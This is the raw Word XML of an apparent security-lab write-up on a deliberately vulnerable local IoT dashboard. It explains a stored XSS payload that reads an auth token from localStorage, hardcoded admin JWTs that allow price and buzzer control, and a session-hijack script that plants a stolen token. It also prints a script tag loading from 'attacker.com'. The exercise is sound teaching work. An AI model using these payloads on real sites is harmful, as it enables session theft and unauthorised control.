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hijack html allows you to bypass the login page</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">the buzzer-control allows you to control the buzzer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1384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419725" cy="13906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08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505450" cy="6953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03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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4f5iywhl4sm6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the payload does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&lt;img src="x" onerror="this.outerHTML='Token: '+localStorage.getItem('auth_token')"&gt;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&lt;img src="x"&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Invalid image source — it will fail to load.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onerror="..."</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: This attribute runs JavaScript </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">when the image fails to load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this.outerHTML = ...</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Replaces the entire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&lt;img&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tag with text.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localStorage.getItem('auth_token')</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Extracts the JWT stored in the browser.</w:t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ty5cui5vf0y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it works in context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submits this HTML as feedback</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the vulnerable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LocalDashboard.html</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> page.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feedback is stored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localStorage</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (no sanitization).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When the dashboard reloads:</w:t>
        <w:br w:type="textWrapping"/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It reads the stored feedback and directly injects it into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innerHTML</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> using:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> javascript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feedbackContainer.innerHTML += `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&lt;div&gt;...&lt;p&gt;${feedback.comment}&lt;/p&gt;...&lt;/div&gt;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`;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So the browser renders this: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&lt;p&gt;&lt;img src="x" onerror="this.outerHTML='Token: '+localStorage.getItem('auth_token')"&gt;&lt;/p&gt;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image fails to load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onerror</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is triggered.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attacker’s code executes and replaces the image with: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Token: eyJ1c2VybmFtZSI6ICJhZG1pbiIs...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vsqkbc9x0va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token-decoder.html</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — JWT Token Decoder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lprjdhi8u7i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it does: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a utility page that decodes </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JWTs (JSON Web Tokens)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the browser. It's meant to inspect the payload of a token.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ffw13j8s4pp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it works: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It reads a token (hardcoded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&lt;textarea&gt;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It splits the token by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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> character — JWTs typically follow this format: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&lt;header&gt;.&lt;payload&gt;.&lt;signature&gt;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decodes the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">first part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[0]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atob()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is incorrect because the payload is in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">second part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[1]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Parses the decoded string as JSON.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Shows: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Decoded fields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human-readable expiration date.</w:t>
        <w:br w:type="textWrapping"/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3tkd51xoiaw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Security Insight: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It demonstrates how attackers or testers can </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">inspect JWTs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use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atob(token.split('.')[0])</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is wrong: it decodes the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">header</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, not the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">payload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Correct should be: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token.split('.')[1]</w:t>
        <w:br w:type="textWrapping"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zlz801vmhxs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3.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price-control.html</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Banana Price Injection via API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inekz49ipv5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it does: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Lets a user send a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POST request</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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/api/price</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoint to set the price of a banana.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lio3igq4536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it works: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Reads a price from the input.</w:t>
        <w:br w:type="textWrapping"/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Uses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fetch()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to send a JSON request to the backend with this structure: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"body": "{\"price\":999.99}"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Adds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Authorization</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> header with a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hardcoded admin JWT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Displays the server’s response.</w:t>
        <w:br w:type="textWrapping"/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qzoamc154rd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Security Insight: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Hardcoded token</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Exposing a JWT in client-side code means </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">anyone</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> who views the HTML source can impersonate an admin.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 is not protected against replay</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or IP restrictions, so it can be called from any browser.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Attackers can </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">inject arbitrary prices</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, e.g., set banana price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0.01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k84f7rgr9ca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4.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buzzer-control.html</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Remote Actuator Hijack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tfjerpz1txv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it does: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Gives web-based control over the physical </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">buzzer actuator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the IoT system.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rqek1be936x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it works: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Has two buttons: ON and OFF.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button calls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controlBuzzer(state)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with either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"on"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"off"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Sends a POST request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/api/buzzer</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with: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"buzzer": "on"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Uses the same </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hardcoded JWT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from earlier.</w:t>
        <w:br w:type="textWrapping"/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y4785v058vy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Security Insight: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Again, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">anyone with the file or token</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> can control critical hardware remotely.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file simulates a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">client-side command injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> via insecure authorization.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 server lacks proper validation or access logging, it's difficult to detect abuse.</w:t>
        <w:br w:type="textWrapping"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eoxt5cgbf9u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5.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hijack.html</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Session Hijacking Page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b2468gedc4d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it does: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Simulates a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">session hijacking</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack where a stolen token is injected into the victim’s browser.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eype2e3xtoa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it works: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Executes this JavaScript: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localStorage.setItem('auth_token', '&lt;admin JWT&gt;');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window.location.href = 'http://localhost:8000/LocalDashboard.html';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Stores the admin’s JWT in the victim’s browser.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Redirects to the dashboard, which reads that token and assumes the user is authenticated.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0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Security Insight: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This page would be the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">payload in an XSS attack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Example:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> html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&lt;script src="http://attacker.com/hijack.html"&gt;&lt;/script&gt;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placed into the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">feedback section</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the dashboard (which is XSS vulnerable), a victim could load this and be silently hijacked.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Once executed, the attacker has </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">persistent access</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as an admin.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